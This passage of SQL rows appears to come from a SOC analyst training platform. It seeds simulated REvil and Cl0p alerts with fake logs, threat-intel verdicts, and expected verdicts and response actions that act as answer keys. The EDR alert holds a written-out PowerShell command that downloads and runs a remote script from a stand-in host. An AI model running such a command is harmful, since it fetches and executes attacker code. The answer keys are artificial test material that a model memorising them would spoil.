'{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised system.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.92.220.65\",\"is_critical\":true,\"osint_result\":{\"source\":\"malicious_ip_database\",\"verdict\":\"malicious\",\"details\":\"Identified as a command and control server related to REvil activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_hash_registry\",\"verdict\":\"malicious\",\"details\":\"Known hash associated with REvil ransomware executable.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.031Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T02:15:45Z\\\",\\\"event_id\\\":\\\"4657\\\",\\\"event_type\\\":\\\"Registry Change Detected\\\",\\\"host\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"administrator\\\",\\\"ip_address\\\":\\\"192.168.1.10\\\",\\\"external_ip\\\":\\\"185.92.220.65\\\",\\\"registry_key\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\maliciousApp\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\REvil\\\\\\\\malicious.exe\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"description\\\":\\\"Registry key modified to establish persistence by REvil malware.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.031Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T02:15:45Z\\\",\\\"event_id\\\":\\\"4657\\\",\\\"event_type\\\":\\\"Registry Change Detected\\\",\\\"host\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"administrator\\\",\\\"ip_address\\\":\\\"192.168.1.10\\\",\\\"external_ip\\\":\\\"185.92.220.65\\\",\\\"registry_key\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\maliciousApp\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\REvil\\\\\\\\malicious.exe\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"description\\\":\\\"Registry key modified to establish persistence by REvil 
malware.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.031Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T02:15:45Z\\\",\\\"event_id\\\":\\\"4657\\\",\\\"event_type\\\":\\\"Registry Change Detected\\\",\\\"host\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"administrator\\\",\\\"ip_address\\\":\\\"192.168.1.10\\\",\\\"external_ip\\\":\\\"185.92.220.65\\\",\\\"registry_key\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\maliciousApp\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\REvil\\\\\\\\malicious.exe\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"description\\\":\\\"Registry key modified to establish persistence by REvil malware.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.031Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T02:15:45Z\\\",\\\"event_id\\\":\\\"4657\\\",\\\"event_type\\\":\\\"Registry Change Detected\\\",\\\"host\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"administrator\\\",\\\"ip_address\\\":\\\"192.168.1.10\\\",\\\"external_ip\\\":\\\"185.92.220.65\\\",\\\"registry_key\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\maliciousApp\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\REvil\\\\\\\\malicious.exe\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"description\\\":\\\"Registry key modified to establish persistence by REvil malware.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.031Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T02:15:45Z\\\",\\\"event_id\\\":\\\"4657\\\",\\\"event_type\\\":\\\"Registry Change Detected\\\",\\\"host\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"administrator\\\",\\\"ip_address\\\":\\\"192.168.1.10\\\",\\\"external_ip\\\":\\\"185.92.220.65\\\",\\\"registry_key\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\maliciousApp\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\REvil\\\\\\\\malicious.exe\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"description\\\":\\\"Registry key modified to establish persistence by REvil malware.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(426, 'Lateral Movement via RDP', 'high', 'Network Traffic Analysis', 'Anomalous RDP connection detected from a known malicious IP address using stolen credentials. This activity matches the lateral movement tactics commonly associated with the REvil group, indicating an attempt to expand access within the network.', 'Lateral Movement', 'T1021.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"src_ip\":\"185.92.220.25\",\"dest_ip\":\"192.168.1.10\",\"username\":\"j.doe\",\"login_method\":\"RDP\",\"event_id\":\"4624\",\"event_type\":\"Logon\",\"logon_type\":\"10\",\"status\":\"Success\",\"hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"filename\":\"malicious_rdp_session.exe\"}', '2026-01-04 04:25:33', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.220.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with REvil operations\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Destination IP within internal network\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"Valid user account within the organization\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known hash for malicious RDP session file\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"185.92.220.25\",\"dst\":\"192.168.1.10\",\"proto\":\"TCP\",\"port\":3389,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(427, 'Data Exfiltration Detected', 'high', 'Data Loss Prevention (DLP) System', 'The DLP system detected a large volume of sensitive data being transferred to an unauthorized external IP address. The data includes financial documents and proprietary design files. The activity is consistent with the REvil attack chain, indicating a potential preparation for ransomware deployment.', 'Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-14T16:42:00Z\",\"event_id\":\"EXFIL-2023-0005\",\"source_ip\":\"192.168.4.25\",\"destination_ip\":\"203.0.113.45\",\"file_hash\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"file_name\":\"financial_report_q3_2023.xlsx\",\"username\":\"jdoe\",\"action\":\"exfiltration\",\"protocol\":\"HTTPS\",\"data_size\":\"2GB\",\"malware_association\":\"REvil\",\"risk_score\":85}', '2026-01-04 04:25:33', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.4.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal database\",\"verdict\":\"internal\",\"details\":\"Internal IP address of user\'s workstation\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known malicious activities\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with REvil exfiltration tools\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"financial_report_q3_2023.xlsx\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"clean\",\"details\":\"Standard financial 
document\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"User of the affected machine\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.033Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T16:42:00Z\\\",\\\"event_id\\\":\\\"EXFIL-2023-0005\\\",\\\"source_ip\\\":\\\"192.168.4.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"3f786850e387550fdab836ed7e6dc881de23001b\\\",\\\"file_name\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"data_size\\\":\\\"2GB\\\",\\\"malware_association\\\":\\\"REvil\\\",\\\"risk_score\\\":85}\"},{\"timestamp\":\"2026-02-01T20:31:19.033Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T16:42:00Z\\\",\\\"event_id\\\":\\\"EXFIL-2023-0005\\\",\\\"source_ip\\\":\\\"192.168.4.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"3f786850e387550fdab836ed7e6dc881de23001b\\\",\\\"file_name\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"data_size\\\":\\\"2GB\\\",\\\"malware_association\\\":\\\"REvil\\\",\\\"risk_score\\\":85}\"},{\"timestamp\":\"2026-02-01T20:30:19.033Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T16:42:00Z\\\",\\\"event_id\\\":\\\"EXFIL-2023-0005\\\",\\\"source_ip\\\":\\\"192.168.4.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"3f786850e387550fdab836ed7e6dc881de23001b\\\",\\\"file_name\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"data_size\\\":\\\"2GB\\\",\\\"malware_association\\\":\\\"REvil\\\",\\\"risk_score\\\":85}\"},{\"timestamp\":\"2026-02-01T20:29:19.033Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T16:42:00Z\\\",\\\"event_id\\\":\\\"EXFIL-2023-0005\\\",\\\"source_ip\\\":\\\"192.168.4.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"3f786850e387550fdab836ed7e6dc881de23001b\\\",\\\"file_name\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"data_size\\\":\\\"2GB\\\",\\\"malware_association\\\":\\\"REvil\\\",\\\"risk_score\\\":85}\"},{\"timestamp\":\"2026-02-01T20:28:19.033Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T16:42:00Z\\\",\\\"event_id\\\":\\\"EXFIL-2023-0005\\\",\\\"source_ip\\\":\\\"192.168.4.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"3f786850e387550fdab836ed7e6dc881de23001b\\\",\\\"file_name\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"data_size\\\":\\\"2GB\\\",\\\"malware_association\\\":\\\"REvil\\\",\\\"risk_score\\\":85}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(428, 'Spear Phishing Email Detected', 'high', 'Email Gateway Logs', 'A spear phishing email has been detected targeting key employees, originating from a known malicious IP address associated with the Cl0p ransomware group. The email contains a crafted attachment designed to deploy an initial payload and harvest credentials.', 'Initial Access', 'T1566.001', 1, 'investigating', 49, '{\"timestamp\":\"2023-10-12T08:30:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.5.23\",\"recipient\":\"j.doe@company.com\",\"sender\":\"support@security-update.com\",\"subject\":\"Urgent: Security Update Required\",\"attachment\":\"Security_Update.exe\",\"attachment_hash\":\"f2a6b7a8c9d4e6f8b5c4d6e7f8a9b0c1\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"message_id\":\"<20231012083000.123456@company.com>\"}', '2026-01-04 04:38:04', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with Cl0p ransomware group.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"support@security-update.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Phishing Database\",\"verdict\":\"malicious\",\"details\":\"Email used in prior spear phishing campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"f2a6b7a8c9d4e6f8b5c4d6e7f8a9b0c1\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Cl0p payload.\"}},{\"id\":\"artifact_4\",\"type\":\"email\",\"value\":\"j.doe@company.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Employee email 
address.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"support@security-update.com\",\"to\":\"j.doe@company.com\",\"subject\":\"Urgent: Security Update Required\",\"date\":\"2026-02-01T20:32:19.034Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"Security_Update.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"hash\":\"f2a6b7a8c9d4e6f8b5c4d6e7f8a9b0c1\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please install the attached security update immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(429, 'Malicious Script Execution', 'high', 'Endpoint Detection and Response (EDR)', 'A malicious script was executed on the endpoint to download and execute additional payloads, establishing a backdoor for persistent control. This follows a successful phishing attack.', 'Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T08:45:33Z\",\"event_type\":\"process_creation\",\"host_ip\":\"10.12.34.56\",\"username\":\"johndoe\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString(\'http://malicious.site/payload.ps1\')\",\"file_hash\":\"ebd0c9b9a1d3b3c4f5a6d7e8f9a0b1c2d3e4f5g6h7i8j9k0\",\"attacker_ip\":\"203.0.113.45\",\"file_name\":\"payload.ps1\",\"process_id\":4521}', '2026-01-04 04:38:04', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple malware distribution campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"ebd0c9b9a1d3b3c4f5a6d7e8f9a0b1c2d3e4f5g6h7i8j9k0\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known backdoor installation scripts.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"payload.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual script executed post-phishing attack.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"10.12.34.56\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"IP address of compromised host.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"johndoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":4521,\"user\":\"johndoe\",\"cmd\":\"powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString(\'http://malicious.site/payload.ps1\')\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"johndoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":4521,\"remote_ip\":\"203.0.113.45\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(430, 'Establishing Persistence via Registry Modification', 'high', 'Windows Registry Logs', 'Cl0p has been observed modifying registry keys to ensure their backdoor persists through system reboots. This technique is used to maintain a foothold in the system and evade basic detection.', 'Persistence', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-23T14:22:35Z\",\"event_id\":4657,\"user\":\"administrator\",\"computer_name\":\"WIN-12AB34CD56\",\"registry_key_path\":\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"registry_value_name\":\"MaliciousApp\",\"registry_value_data\":\"\\\"C:\\\\Windows\\\\System32\\\\malicious.exe\\\"\",\"source_ip\":\"192.168.1.100\",\"attacker_ip\":\"203.0.113.45\",\"file_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\"}', '2026-01-04 04:38:04', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known Cl0p APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash matches known Cl0p malware sample.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Local Threat Database\",\"verdict\":\"suspicious\",\"details\":\"File name commonly used by Cl0p group.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.036Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-23T14:22:35Z\\\",\\\"event_id\\\":4657,\\\"user\\\":\\\"administrator\\\",\\\"computer_name\\\":\\\"WIN-12AB34CD56\\\",\\\"registry_key_path\\\":\\\"HKLM\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"MaliciousApp\\\",\\\"registry_value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\\\\\"\\\",\\\"source_ip\\\":\\\"192.168.1.100\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.036Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-23T14:22:35Z\\\",\\\"event_id\\\":4657,\\\"user\\\":\\\"administrator\\\",\\\"computer_name\\\":\\\"WIN-12AB34CD56\\\",\\\"registry_key_path\\\":\\\"HKLM\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"MaliciousApp\\\",\\\"registry_value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\\\\\"\\\",\\\"source_ip\\\":\\\"192.168.1.100\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.036Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-23T14:22:35Z\\\",\\\"event_id\\\":4657,\\\"user\\\":\\\"administrator\\\",\\\"computer_name\\\":\\\"WIN-12AB34CD56\\\",\\\"registry_key_path\\\":\\\"HKLM\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"MaliciousApp\\\",\\\"registry_value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\\\\\"\\\",\\\"source_ip\\\":\\\"192.168.1.100\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.036Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-23T14:22:35Z\\\",\\\"event_id\\\":4657,\\\"user\\\":\\\"administrator\\\",\\\"computer_name\\\":\\\"WIN-12AB34CD56\\\",\\\"registry_key_path\\\":\\\"HKLM\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"MaliciousApp\\\",\\\"registry_value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\\\\\"\\\",\\\"source_ip\\\":\\\"192.168.1.100\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.036Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-23T14:22:35Z\\\",\\\"event_id\\\":4657,\\\"user\\\":\\\"administrator\\\",\\\"computer_name\\\":\\\"WIN-12AB34CD56\\\",\\\"registry_key_path\\\":\\\"HKLM\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"MaliciousApp\\\",\\\"registry_value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\\\\\"\\\",\\\"source_ip\\\":\\\"192.168.1.100\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
